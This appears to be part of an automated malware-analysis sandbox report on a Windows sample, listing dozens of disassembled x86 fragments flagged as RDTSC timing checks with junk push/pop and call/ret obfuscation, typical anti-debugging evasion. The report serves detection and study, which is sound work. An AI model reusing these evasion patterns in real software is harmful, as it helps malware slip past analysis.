                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF58E7 second address: EF58EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5951 second address: EF5957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF59AC second address: EF59BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5C49 second address: EF5C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5E03 second address: EF5E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5E08 second address: EF5E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FC220745DF8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1B79h], ebx 0x0000002c jmp 00007FC220745E00h 0x00000031 mov dword ptr [ebp+124474C8h], ebx 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC220745E07h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5E71 second address: EF5E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF630E second address: EF6317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF6317 second address: EF631B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF631B second address: EF6330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 ja 00007FC220745DF8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF6330 second address: EF6334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF6334 second address: EF639E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC220745DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c clc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FC220745DF8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FC220745DF8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 je 00007FC220745DFCh 0x0000004b mov esi, dword ptr [ebp+122D29C6h] 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 jnc 00007FC220745DF6h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF639E second address: EF63D5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FC221A94B31h 0x00000010 jmp 00007FC221A94B2Bh 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC221A94B38h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7C4F second address: EF7C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7C53 second address: EF7C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF865A second address: EF86AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FC220745DFFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 sub dword ptr [ebp+1244C01Ch], edx 0x00000016 xor dword ptr [ebp+1244C53Ah], edi 0x0000001c push 00000000h 0x0000001e mov edi, 550610D3h 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+124449ABh], edi 0x0000002b xchg eax, ebx 0x0000002c push ebx 0x0000002d jmp 00007FC220745E06h 0x00000032 pop ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF86AE second address: EF86B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF91C6 second address: EF91E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF91E3 second address: EF91E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF8F20 second address: EF8F45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FC220745DFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBB33 second address: EFBB37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBB37 second address: EFBB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBB45 second address: EFBB4F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F00C83 second address: F00C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAC494 second address: EAC498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAC498 second address: EAC4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04240 second address: F0428F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC221A94B32h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D1AAFh] 0x00000016 push 00000000h 0x00000018 mov bh, F0h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FC221A94B28h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 xchg eax, esi 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a jl 00007FC221A94B26h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050A7 second address: F050AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0613B second address: F0613F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F062DF second address: F062EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FC220745DF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0809B second address: F080A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F080A0 second address: F080F4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC220745DFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d xor ebx, dword ptr [ebp+122D1B0Fh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FC220745DF8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D2B3Eh] 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push esi 0x0000003c pop esi 0x0000003d je 00007FC220745DF6h 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F07256 second address: F0725A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09135 second address: F09139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09139 second address: F0913F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0913F second address: F09149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC220745DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F09149 second address: F091C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC221A94B28h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 clc 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007FC221A94B28h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 push 00000000h 0x00000045 jmp 00007FC221A94B39h 0x0000004a xchg eax, esi 0x0000004b push ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F091C5 second address: F091C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F091C9 second address: F091EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F091EF second address: F091F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F08349 second address: F0834D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B2B3 second address: F0B310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jne 00007FC220745DFEh 0x0000000c nop 0x0000000d call 00007FC220745E01h 0x00000012 mov edi, dword ptr [ebp+122D2832h] 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c mov ebx, edi 0x0000001e pop ebx 0x0000001f push 00000000h 0x00000021 xor dword ptr [ebp+122D19CAh], eax 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push ebx 0x0000002a pushad 0x0000002b popad 0x0000002c pop ebx 0x0000002d pop eax 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jng 00007FC220745E08h 0x00000037 jmp 00007FC220745E02h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C243 second address: F0C29D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC221A94B28h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push edx 0x00000027 add bx, 951Dh 0x0000002c pop ebx 0x0000002d push 00000000h 0x0000002f mov dword ptr [ebp+124449ABh], eax 0x00000035 push 00000000h 0x00000037 call 00007FC221A94B31h 0x0000003c push eax 0x0000003d xor bh, 00000054h 0x00000040 pop edi 0x00000041 pop ebx 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B4D3 second address: F0B4F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FC220745DFFh 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E2E4 second address: F0E301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FC221A94B33h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E301 second address: F0E30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC220745DFAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0D5F8 second address: F0D60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B31h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0F59A second address: F0F5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0F5A0 second address: F0F646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D273Fh], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FC221A94B28h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov bx, di 0x00000035 sub dword ptr [ebp+122D35A9h], ebx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 xor di, 3000h 0x00000047 mov eax, dword ptr [ebp+122D1519h] 0x0000004d mov dword ptr [ebp+122D1B79h], ebx 0x00000053 jnp 00007FC221A94B2Ch 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push ebx 0x0000005e call 00007FC221A94B28h 0x00000063 pop ebx 0x00000064 mov dword ptr [esp+04h], ebx 0x00000068 add dword ptr [esp+04h], 0000001Bh 0x00000070 inc ebx 0x00000071 push ebx 0x00000072 ret 0x00000073 pop ebx 0x00000074 ret 0x00000075 movsx ebx, dx 0x00000078 push eax 0x00000079 pushad 0x0000007a ja 00007FC221A94B2Ch 0x00000080 jo 00007FC221A94B2Ch 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14551 second address: F14555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14555 second address: F14571 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC221A94B2Ch 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19D37 second address: F19D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19D3F second address: F19D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F20893 second address: F208AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007FC220745DF8h 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FC220745DF6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F208AB second address: F208C7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC221A94B2Ah 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F208C7 second address: F208CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F208CB second address: F208EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FC221A94B32h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F208EE second address: F208F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24262 second address: F24269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24269 second address: F24285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E06h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24285 second address: F24289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24787 second address: F2478B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2478B second address: F247A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC221A94B31h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F247A6 second address: F247CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC220745DFDh 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007FC220745DF6h 0x0000001b pop ebx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A8B second address: F24A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A97 second address: F24A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A9B second address: F24AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC221A94B2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24E9C second address: F24EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 jmp 00007FC220745E06h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push edi 0x00000010 ja 00007FC220745DF6h 0x00000016 jo 00007FC220745DF6h 0x0000001c pop edi 0x0000001d jl 00007FC220745DFAh 0x00000023 push eax 0x00000024 pop eax 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pushad 0x0000002e popad 0x0000002f pop eax 0x00000030 pushad 0x00000031 push edx 0x00000032 pop edx 0x00000033 pushad 0x00000034 popad 0x00000035 jnp 00007FC220745DF6h 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24EE9 second address: F24EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24EEF second address: F24EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24EF5 second address: F24EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1046B second address: F10475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC220745DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E104 second address: F2E108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E427 second address: F2E43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007FC220745DFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E43E second address: F2E444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E444 second address: F2E448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E5B3 second address: F2E5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2DB80 second address: F2DB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2DB8A second address: F2DB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2DB95 second address: F2DB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
